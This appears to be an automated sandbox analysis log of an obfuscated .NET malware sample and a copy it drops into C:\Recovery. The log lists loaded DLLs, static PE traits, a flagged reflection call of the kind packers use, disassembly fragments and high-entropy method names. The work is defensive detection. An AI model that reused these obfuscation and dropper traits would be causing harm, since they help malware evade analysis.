Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: urlmon.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: iertutil.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: srvcli.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: netutils.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: wintypes.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: appresolver.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: bcp47langs.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: slc.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: sppc.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: mscoree.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: version.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: wldp.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: profapi.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: sspicli.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: ktmw32.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: wbemcomn.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: amsi.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: userenv.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: iphlpapi.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: dnsapi.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: dhcpcsvc.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: winnsi.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rasapi32.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rasman.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rtutils.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: mswsock.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: winhttp.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rasadhlp.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: fwpuclnt.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: propsys.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: apphelp.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: dlnashext.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: wpdshext.dll
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: edputil.dll

Source: C:\Users\user\Desktop\FuWRu2Mg82.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{289AF617-1CC3-42A6-926C-E6A863F0E3BA}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Recovery\axnJvpyQnMRKSw.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: FuWRu2Mg82.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: FuWRu2Mg82.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: FuWRu2Mg82.exe

Static file information: File size 3666432 > 1048576

Source: FuWRu2Mg82.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x37ea00

Source: FuWRu2Mg82.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: stem.pdbpdbtem.pdbj source: axnJvpyQnMRKSw.exe, 00000033.00000002.2594691011.0000000001105000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: axnJvpyQnMRKSw.exe, 0000001A.00000002.2233548129.000000001B7FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: axnJvpyQnMRKSw.exe, 0000000E.00000002.2002706193.000000001C8A4000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000020.00000002.2365797037.000000001CCA0000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000026.00000002.2388785557.0000000001366000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 0000002C.00000002.2482566801.00000000009F6000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000033.00000002.2759594209.000000001B7D2000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000039.00000002.2847414592.000000001AFD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: s\dll\System.pdb source: axnJvpyQnMRKSw.exe, 00000005.00000002.1918500382.000000001C5A8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: stem.pdbpdbtem.pdbd source: axnJvpyQnMRKSw.exe, 0000002C.00000002.2624188199.000000001AF60000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: axnJvpyQnMRKSw.exe, 0000000E.00000002.2002706193.000000001C8A4000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000020.00000002.2365797037.000000001CCA0000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000026.00000002.2388785557.0000000001366000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 0000002C.00000002.2482566801.00000000009F6000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000033.00000002.2759594209.000000001B7D2000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000039.00000002.2847414592.000000001AFD0000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: FuWRu2Mg82.exe, tOWRGy4qUJmhaaSFJSA.cs

.Net Code: Type.GetTypeFromHandle(wAKv0TObBDoP55Cbieg.oD4yF2SlcM6(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(wAKv0TObBDoP55Cbieg.oD4yF2SlcM6(16777245)),Type.GetTypeFromHandle(wAKv0TObBDoP55Cbieg.oD4yF2SlcM6(16777259))})

Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Code function: 0_2_00007FFD9BA1437E push ds; ret	0_2_00007FFD9BA1437F
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Code function: 0_2_00007FFD9BA15D6D push ss; retf	0_2_00007FFD9BA15D7A
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 5_2_00007FFD9BAC437E push ds; ret	5_2_00007FFD9BAC437F
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 5_2_00007FFD9BAC5D6D push ss; retf	5_2_00007FFD9BAC5D7A
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 5_2_00007FFD9BC24A0E push ss; ret	5_2_00007FFD9BC24A0F
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 5_2_00007FFD9BC23DC2 push ebp; iretd	5_2_00007FFD9BC23DD0
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 5_2_00007FFD9C218167 push ebx; ret	5_2_00007FFD9C21816A
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 5_2_00007FFD9C2121C0 push ebx; retf FF7Ah	5_2_00007FFD9C21233A
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 14_2_00007FFD9BAB437E push ds; ret	14_2_00007FFD9BAB437F
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 14_2_00007FFD9BAB5D6D push ss; retf	14_2_00007FFD9BAB5D7A
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 14_2_00007FFD9BE7630E pushad ; retf	14_2_00007FFD9BE76311
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 20_2_00007FFD9BAA437E push ds; ret	20_2_00007FFD9BAA437F
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 20_2_00007FFD9BAA5D6D push ss; retf	20_2_00007FFD9BAA5D7A
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 20_2_00007FFD9BC04A0E push ss; ret	20_2_00007FFD9BC04A0F
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 20_2_00007FFD9BC03DC2 push ebp; iretd	20_2_00007FFD9BC03DD0
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 20_2_00007FFD9C1F8167 push ebx; ret	20_2_00007FFD9C1F816A
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 20_2_00007FFD9C1F21C0 push ebx; retf FF7Ah	20_2_00007FFD9C1F233A
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 26_2_00007FFD9BAE5899 pushfd ; retf	26_2_00007FFD9BAE58F1
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 26_2_00007FFD9BAC437E push ds; ret	26_2_00007FFD9BAC437F
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 26_2_00007FFD9BAC5D6D push ss; retf	26_2_00007FFD9BAC5D7A
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 26_2_00007FFD9BAF8167 push ebx; ret	26_2_00007FFD9BAF816A
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 26_2_00007FFD9BC24A0E push ss; ret	26_2_00007FFD9BC24A0F
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 26_2_00007FFD9BC23DC2 push ebp; iretd	26_2_00007FFD9BC23DD0
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 26_2_00007FFD9BEA7C2E pushad ; retf	26_2_00007FFD9BEA7C5D
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 26_2_00007FFD9BEA78FB push ebx; retf	26_2_00007FFD9BEA796A
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 26_2_00007FFD9BEA7C5E push eax; retf	26_2_00007FFD9BEA7C6D
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 26_2_00007FFD9C2267C2 push E95ED6E0h; ret	26_2_00007FFD9C226809
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 26_2_00007FFD9C2121C0 push ebx; retf FF7Ah	26_2_00007FFD9C21233A
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 32_2_00007FFD9BAE8167 push ebx; ret	32_2_00007FFD9BAE816A
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 32_2_00007FFD9BAB437E push ds; ret	32_2_00007FFD9BAB437F
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 32_2_00007FFD9BAB5D6D push ss; retf	32_2_00007FFD9BAB5D7A

Source: FuWRu2Mg82.exe, nk4J4IFLhoJ7cR88FDP.cs	High entropy of concatenated method names: 'hYnFl49hDp', 'EvZFOesFsg', 'igEFJoh2vB', 'AFlFz52Mt6', 'SNJHghD0GL', 'LDDHeogHDL', 'OQoHymCIlH', 'IdpTDveKR8iu4FyBdqtI', 'GejUUBeKwH7oIHTUREsa', 'sQG7iheKtJ5x4FyoUi3A'
Source: FuWRu2Mg82.exe, tLVlnnFNmrHPGNt0l4W.cs	High entropy of concatenated method names: 'KZqF6SrcPt', 'HQVl4beKgSbemViIsU5s', 'kfK0jVeDJhdMW6uKyqlf', 'Yldw8DeDzSU2HST5nAP9', 'tIB2iveKe4TfJ5wbq0up', 'NQ4DsUeKy02d2q64jKBL', 'U1J', 'P9X', 'ABwe7VtE3CI', 'mEke7k468Y3'
Source: FuWRu2Mg82.exe, favLG4dtscPwKAAyWpy.cs	High entropy of concatenated method names: 'NZJdaQDUmV', 'Un5MoReWbRIXTOZ4hKhC', 'hlaK6DeWsEiBDiihSkSh', 'THDWFieWwNmlHYWEHxMc', 'TVHEUxeWvUCoVCRmN3V4', 'IPy', 'method_0', 'method_1', 'method_2', 'vmethod_0'
Source: FuWRu2Mg82.exe, T39XNsyFHnVJBTZ1Aty.cs	High entropy of concatenated method names: 'CJJyiGATxq', 'IJuyxaobAm', 'BrvytAiYkJ', 'dVSyC5DmnG', 'jQ5dZgeEsG5Wu3EbutTv', 'GcBdqbeEv7psE6JHKee6', 'UaTSUNeEbXPsCgci5DOV', 'm7IrBueEVpXdrY6GhWWZ', 'Baul5XeEk8wOgwaFBP9P', 'krXNCAeEq1eRiroBgKpj'
Source: FuWRu2Mg82.exe, ePNnaRaNedRkbxPgByF.cs	High entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'UHGaTBJKSU', 'Yy0aME7oR4', 'Dispose', 'D31', 'wNK'
Source: FuWRu2Mg82.exe, r0LcLa4gh61WNyYR6N4.cs	High entropy of concatenated method names: 'uW547cFeiX', 'eK84F1lcjU', 'Sxo5aYel6eimnLkWaFJ1', 'HoqBIEelP4cKCOZw7D2t', 'QpONCbelMFRNDe4ONPG0', 'sj80dIelrZ64gZDLPpR8', 'XSqL9telL7ejFShL9fHU', 'bxvESFelS9pjpEDMdihG', 'VnY4yh2EeF', 'q91SYUelA7pQvgnbje1p'
Source: FuWRu2Mg82.exe, tOWRGy4qUJmhaaSFJSA.cs	High entropy of concatenated method names: 'xgsCNpeOxLxeJSv0Xqdw', 'g0oFNjeOt6qXDuWm6RqK', 'OtSlWbgZn0', 'UOt8IueOvXqIyQ803yuw', 'oEHE8feObmFX36MWIHie', 'orL8Y3eOsXALyVPqaOmS', 'GQJeNeeOV76s2HvHhWQH', 'Fg9gQjeOkAR3EctAccqk', 'P6XHyBeOqFSWsR9GAhsu', 'qoLPsVeOn07ipa2FxH1L'
Source: FuWRu2Mg82.exe, CQcwjv5ZxNO6l1ejerO.cs	High entropy of concatenated method names: 'w52', 'o38', 'vmethod_0', 'HyI5lXilSc', 'Q3UexnXeICA', 'zZnEYweXdW4D3jVNkqK2', 'nFg9ReeX2Dix6xXLrVuJ', 'cRbkrCeXUb9QJ8SaZEd6', 'TZKb09eXGXmxZKhMo4WZ', 'xF3EuieXQ16D1l7EuTWW'
Source: FuWRu2Mg82.exe, WkHO32FVh0MakN2xhUJ.cs	High entropy of concatenated method names: 'LvZFhiMbtw', 'P61FEF7PvM', 'H8FFmW4P56', 'MWepCueDUm09YLLoJbGF', 'YnDuiceDdmtVQwgvpoiu', 'plmSrBeD1SndLS3VlRP6', 'pBdyrFeD28or0bxh1JfU', 'XWoFB6ILpn', 'g2IFaDcfU9', 'VoQ9y3eD9vGoUTGbHd9m'
Source: FuWRu2Mg82.exe, VWv1e1qZKlCB90mKSy.cs	High entropy of concatenated method names: 'WeQorTxVv', 'WQr5dZecKU5LrkiukPNa', 'iwNlTvec3idbwiCliGtQ', 'USqjwrecD73qRcVbRkik', 'sxgxdQec99tWCm7R7AJ0', 'yJbY7kEnu', 'BdE54WvF1', 'DhNuAGwPg', 'PbvpiWXjH', 'eHqf534rW'
Source: FuWRu2Mg82.exe, UtiXsLdIUDgwFsNpOeF.cs	High entropy of concatenated method names: 'zdVexak8a5P', 'LPXdMcAw2q', 'Mv9drvIcIP', 'P1Wd6NMyKI', 'V4Tf7deW82qPCgQvugjb', 'oeibiteWcHjoQg7vukMF', 'YEO4FreWh043iifMo335', 'jJE41keWEGnUnuViiJaO', 'wL2cQEeWmduwLBuNQ8wg', 'rhI50OeW3LHikXZfJnEn'
Source: FuWRu2Mg82.exe, gyY3Nh56wYCVQGESF2D.cs	High entropy of concatenated method names: 'anfexkfZYAW', 'sIL5LHKHpI', 'nMKexqAH65e', 'hXCUEReX3uC3I9V3jvPO', 'RyvTwteXDQEWikNrIq00', 'oXHRULeXEt1442Yc6gd7', 'DwDND2eXmfUbhDnjru4v', 'OvpiPLeXK7k43bgphscZ', 'dvYa9LeX9IqDSHSwjnBN', 'wZCQu0eXof2uneUGcnx8'
Source: FuWRu2Mg82.exe, cW5pRQxFt7ui7EqOACV.cs	High entropy of concatenated method names: 'O3I', 'P9X', 'dkEe78L05rW', 'vmethod_0', 'imethod_0', 'yCE9QjeokHqFackty6v3', 'A77Zvweos1FtuVxh9GpN', 'JS2Z3leoVgv1CxtWvfGx', 'q1CrApeoqKC7xvO6KAO9', 'O5DDBIeonOUBUQYmgjKd'
Source: FuWRu2Mg82.exe, vNBFOkOG772pNRLDxkl.cs	High entropy of concatenated method names: 'AljeHK9XGo9', 'OfWeH9F6Rxm', 'oWGeHouno90', 'Ri4eH1j7W1J', 'rmKeH2bmww1', 'B5veHUErlpA', 'w7PeHda2QyB', 'qfXJFr3JyY', 'j3JeHGeJReU', 'yNkeHQN8os8'
Source: FuWRu2Mg82.exe, AkAXWXYd7YdXcmMlgnx.cs	High entropy of concatenated method names: 'niGYTMAWqE', 'GF6YM87a3A', 'g4lYr3P2ca', 'FGW09HeQVnjjUuLMrZlK', 'kmcGJReQbSs2ZBQmq4sN', 'u0YefaeQs80rBHwIUH4c', 'mmmYQ79MKq', 'UObYX4lmxm', 'CmrYA8B24H', 'DJF6BJeQtRArqGWvLcpf'
Source: FuWRu2Mg82.exe, kDEadYitgqAVo2lFZ0p.cs	High entropy of concatenated method names: 'axIiRk25Uw', 'nYniwTrfqt', 'jgNg1ee9sME1EFOdShxD', 'xUKfnoe9vcGfDhcapejQ', 'qijiJVe9bODn1e97eh9E', 'THv8Ure9VAy18ae7gg54', 'NEBUVMe9ktXSeVTiJulG', 'VEJ6Ufe9qkRReP52VvF8', 'LK628Ie9np9hQapCwfuZ', 'N8Hu2Ze9YvTmq8vMS4wY'
Source: FuWRu2Mg82.exe, VM1wHB9Plr0wlOyF1xO.cs	High entropy of concatenated method names: 'fw29SFF5LB', 'k6r', 'ueK', 'QH3', 'lfd9W5jppP', 'Flush', 'ag69jsGbkS', 'whw9ZSQSJA', 'Write', 'aZB94vrdgE'
Source: FuWRu2Mg82.exe, GeKtSlHXEa96Dx06BJD.cs	High entropy of concatenated method names: 'gPNHZEUIlm', 'PHMH4tBX3W', 'c6IHlbKYxc', 'lhxnX5e9yxc6BI0XlZwd', 'wuivsee90p82MiLjpfjR', 'zCfuWJe9gHAl5PI6uxMJ', 'cN88Vce9eUGBxZJqfwKY', 'aqbHN4QQgL', 'G1EHIf6QQG', 'HbUHTwboAQ'
Source: FuWRu2Mg82.exe, zERbyQZDXXtJfcseBZ9.cs	High entropy of concatenated method names: 'b1vZ9A401e', 'g3gZogsQl2', 'womZ189Gqm', 'Q2jZ2MFRex', 'Dispose', 'aiB3HkeluAHWvCNx44Ub', 'dHlWLlelYg0NWKemYvgd', 'Yhssnnel5jLFmjJKPE3T', 'hVfspUelpvDspQI85hVI', 'aF0afvelfJhaRsehaF7n'
Source: FuWRu2Mg82.exe, FjJGD0mDr1jUGvBNiDF.cs	High entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
Source: FuWRu2Mg82.exe, dKDASbBCGWuI3j92E9U.cs	High entropy of concatenated method names: 'o6hBDDiSuy', 'vWEBwcWaKP', 'H1gBvrb7Bi', 'mUZBbj1sey', 'A57BsXxt6O', 'YtGBV4P6Qe', 'LU1BkNpSY4', 'fTHBqbJZ8I', 'UP4Bn4IDL9', 'DWUBYeYs47'
Source: FuWRu2Mg82.exe, l3rD46cDqpZSKbiosy2.cs	High entropy of concatenated method names: 'method_0', 'Pp7c9uLpQl', 'mo8coEYx7d', 'hRPc1E9p6C', 'UrOc2F6gQB', 'oTicUlMX6Y', 'PVZcdb9H0H', 'oXyKu4eTatlI5I9sel3m', 'wwgEBLeT8j3u5yGyrJMS', 'Yq01ULeTcrN8JvtmmmhY'
Source: FuWRu2Mg82.exe, LTyZpOYE2IXa1SjnWU0.cs	High entropy of concatenated method names: 'AKFY2AOIyE', 'kg57BBeQHGSH5VTk7eDa', 'FQP9cveQ73Wr4o9mgNAp', 'kHZbw9eQF1OBFHcqCp05', 'Kk7LjHeQiPZfESuK2Oix', 'OHKY3MfmO2', 'QRrYD61Ss7', 'GpOYK7AasF', 'ek4G3heQeFM8gbsbYQAQ', 'jg3y1reQyEIaGF7fyk13'
Source: FuWRu2Mg82.exe, mndWkC3JySUvWuDBg3a.cs	High entropy of concatenated method names: 'KxbDgySJlL', 'X5tDebUQ2i', 'Yd7', 'H2HDynuLea', 'TicD0R2cuX', 'nxED7BP9vV', 'CKbDFMdsQC', 'thahWTe6ZIvsroW9SRVI', 'AlZM2oe64ymfseZSeV2H', 'eWrarKe6lGiNE49EUrKv'
Source: FuWRu2Mg82.exe, CmO3p2xTCjFvjHleQSi.cs	High entropy of concatenated method names: 'rPdxZQ44nr', 'MmxumPe1w0Ne2w0IsMq8', 'BB3X3je1vAaAO064YZgc', 'TCI1Eee1bAw0XNLrc473', 'lyBE2ke1s1IRDt65m3D1', 'P9X', 'vmethod_0', 'BDGe7hrRmVk', 'imethod_0', 'A2cXnre1x0yWs8OATQZW'
Source: FuWRu2Mg82.exe, MML3KPhXMsNC20mjk3R.cs	High entropy of concatenated method names: 'd9MhOYsj9x', 'FBXhzUIIRp', 'KlOhNWiboW', 'YprhIW5OND', 'SjKhT6RlKb', 'NWyhMRNe6E', 'WQdhrbhpUo', 'mlHh6hamZj', 'DK9hP4Pdg6', 'l1whLsR52n'
Source: FuWRu2Mg82.exe, tBWu7rDltxFVCrgpPUg.cs	High entropy of concatenated method names: 'umRDJ7PfO2', 'Xw2Dz3YsAQ', 'jTbKgVRyFa', 'EANKeTm5Ex', 'iIrKyp89Sg', 'GSRK0G0NhI', 'Rpx', 'method_4', 'f6W', 'uL1'
Source: FuWRu2Mg82.exe, bA8lwf0ciJr0GB9lvMZ.cs	High entropy of concatenated method names: 't140AJEGj6', 'emn0NWDMvL', 'qcc0I9ByWZ', 'IBmYNYemNArvmrV8fRMC', 'DF7R60emXSS5WVVF4i7i', 'VQHw9WemAMqIhscIv4R1', 'xPt0E2GMii', 'uWF0m7OSAw', 'kVZ03MdXnT', 'pHJ0D6OHLX'
Source: FuWRu2Mg82.exe, tvKCiCET9mc0BR8oBIG.cs	High entropy of concatenated method names: 'rA2Ero8WA9', 'U2mE6JBAH8', 'C8QEPHOX6d', 'AYQCEgeMGhoDwliY6r6r', 'YZ36syeMQkfble9s3J3m', 'mLCkjNeMX1wSONJVtVrX', 'nblFgjeMA5JksmhEVovp', 'SE0rEpeMN5UfcECk8RQr', 'g1PgPXeMIFDqWucvnDKG', 'S57bAVeMTvcT7Vq4KCmv'
Source: FuWRu2Mg82.exe, a3LrvUyPcM3V9rs2rg4.cs	High entropy of concatenated method names: 'v6f0iaI8A6', 'jyuGTneElxDrtyG3Miup', 'xB3VxBeEOXk2K3yTtabe', 'VovsVoeEJIJcdhTBYBo2', 'iTvcvdeEzJcMYZeMQerW', 'pWWk4YeEZtNuYfpSIaXR', 'cKh3OheE4HJpxrnYZLPH', 'vEbJHUemgvBQfe1CDJuy', 'QeG0tOemeQeSrbT4cQ8I', 'XXn0g0MWy5'
Source: FuWRu2Mg82.exe, VyjgJ17K4Oe7MLWZJ2u.cs	High entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'rEyex7kIYVg', 'bjLe7ewdgZl', 'Vxkwm7e31jg5H8ASWm99', 'MNxZkje32Ql25AfR6aJZ', 'CkEm0we3UqjDIVZWUCCR', 'DAUhxie3d9X9UBOipuhv', 'XbZy0se3Gi2mWlLiPcA2'
Source: FuWRu2Mg82.exe, UOsPQ6213qwyVFXXskm.cs	High entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'QTFMh5eSDYbFTUPOfhTg', 'bAkdlZeSmuxtxNUvjaKv', 'TqqL2DeS3ExVHAG7fY1j'
Source: FuWRu2Mg82.exe, vHW9N5xpdjiNQjtaFIS.cs	High entropy of concatenated method names: 'O9dxBNHI4y', 'hjVkAxeoNxaUk4BZjGhl', 'Nw6jWneoINXvpiqgIyyw', 'lKdkCleoTl6UGFTpOSoX', 'jsKKNJeoMfwMlT9UHWT6', 'qMyDUbeoXCUaDwyLHDkI', 'Mby94PeoA8a2EPR2PSJG', 'VRtjKaeorvtqpMQZKSr7'
Source: FuWRu2Mg82.exe, F2EcgvxCQQJBryq9py9.cs	High entropy of concatenated method names: 'iqdxwZrdWa', 'DFAxvhhqJa', 'jPyxb1QRM7', 'twf02qeof2d4YqfHBkgH', 'jbMXqjeoBvMsQwyTbvXp', 'nXH7F4eou4Yek5ff3XW3', 'HloapFeopUdtah5jfcGe', 'i3nSLJeoaQhPo3GVygu0', 'FFmlyNeo8PUebNIgbYwO', 'sDekdeeocWqEKrOOpCAL'
Source: FuWRu2Mg82.exe, skdRDhuFVAYjjRwKptb.cs	High entropy of concatenated method names: 'method_0', 'method_1', 'K47', 'KnOuirKaB4', 'vmethod_0', 'xSBuxJDSmT', 'gdjexuapCqT', 'cESAbMeXZHP3vwksDpKC', 'wnf4YOeXWpJ6vo3THyO8', 'iekYlheXjLIIpAwhWhb4'
Source: FuWRu2Mg82.exe, yNKsMSpv0PBHPM3maP7.cs	High entropy of concatenated method names: 'vaJBehHMBL', 'VbaJfEeNKCsDBg9gGsCS', 'vAcNG0eN3uQJyFw3Aere', 'FLHy8ceNDxNNvmlhPqiT', 'gVrLpMeN97aWHHg0cCGm', 'Juqpse5TuG', 'FXspVkdgnA', 'L8fpkEQu5R', 'yMxpqaPkBY', 'WIRpnqhVo2'
Source: FuWRu2Mg82.exe, UhpvUPmxbVPtta5O3kC.cs	High entropy of concatenated method names: 'pAymCNetKP', 'osVmRVvkRb', 'BaAmwyKm1F', 'AVd5SperipVE6GTJKYGg', 'GYDJ9jerF3YG6IqUoQhZ', 'CuJxkIerHgS24tjXUUQr', 'eZ7NQserxZjfCrdWZHqd', 'Fy8LbsertABFLOaI4CbF'
Source: FuWRu2Mg82.exe, vm38sayDm9Jh7SP67oI.cs	High entropy of concatenated method names: 'uLOyXOaDvP', 'gMJyAIOOQp', 'bBWscEeEUx9cI8sGKpM5', 'a2QrK3eE1b8M5H1eJtOc', 'gbsuGCeE2VnnDLTvB67l', 'ig5onKeEdmmFNGkpyV4N', 'tsbyMxKTRO', 'Auea6VeEQKc1nuMPCI8I', 'AMh5VGeEXevWBA3hhHU2', 'vbSAOKeEA7X1ZbcO78hY'
Source: FuWRu2Mg82.exe, rUOf6N8WGynQsymqq65.cs	High entropy of concatenated method names: 'oXu8Zbf9OG', 'e2E84ilk4d', 'fcn8ly0rqH', 'DtKIRLeTR0VXXIi50JEi', 'jOdA6teTtKo9X7UsvGeN', 's4YaKkeTCyip9IZl5G1f', 'SA8HiBeTwx4Y1pOJSCKL', 'FJRGGveTvQmPGflVYw61', 'pSAMw3eTbu218K0Ngtx7'
Source: FuWRu2Mg82.exe, NY3n2amQPf5FWSSrMrY.cs	High entropy of concatenated method names: 'HlSmAiAALq', 'UvvmNcqSxm', 'TAgmIIq1dr', 'pBTmToF0Wi', 'gWjmMxioe3', 'fKDmrc7vL4', 'Fjpm6j3ANa', 'GtGmPtqqXZ', 'Gp4mL8wIxx', 'b88mShNQni'
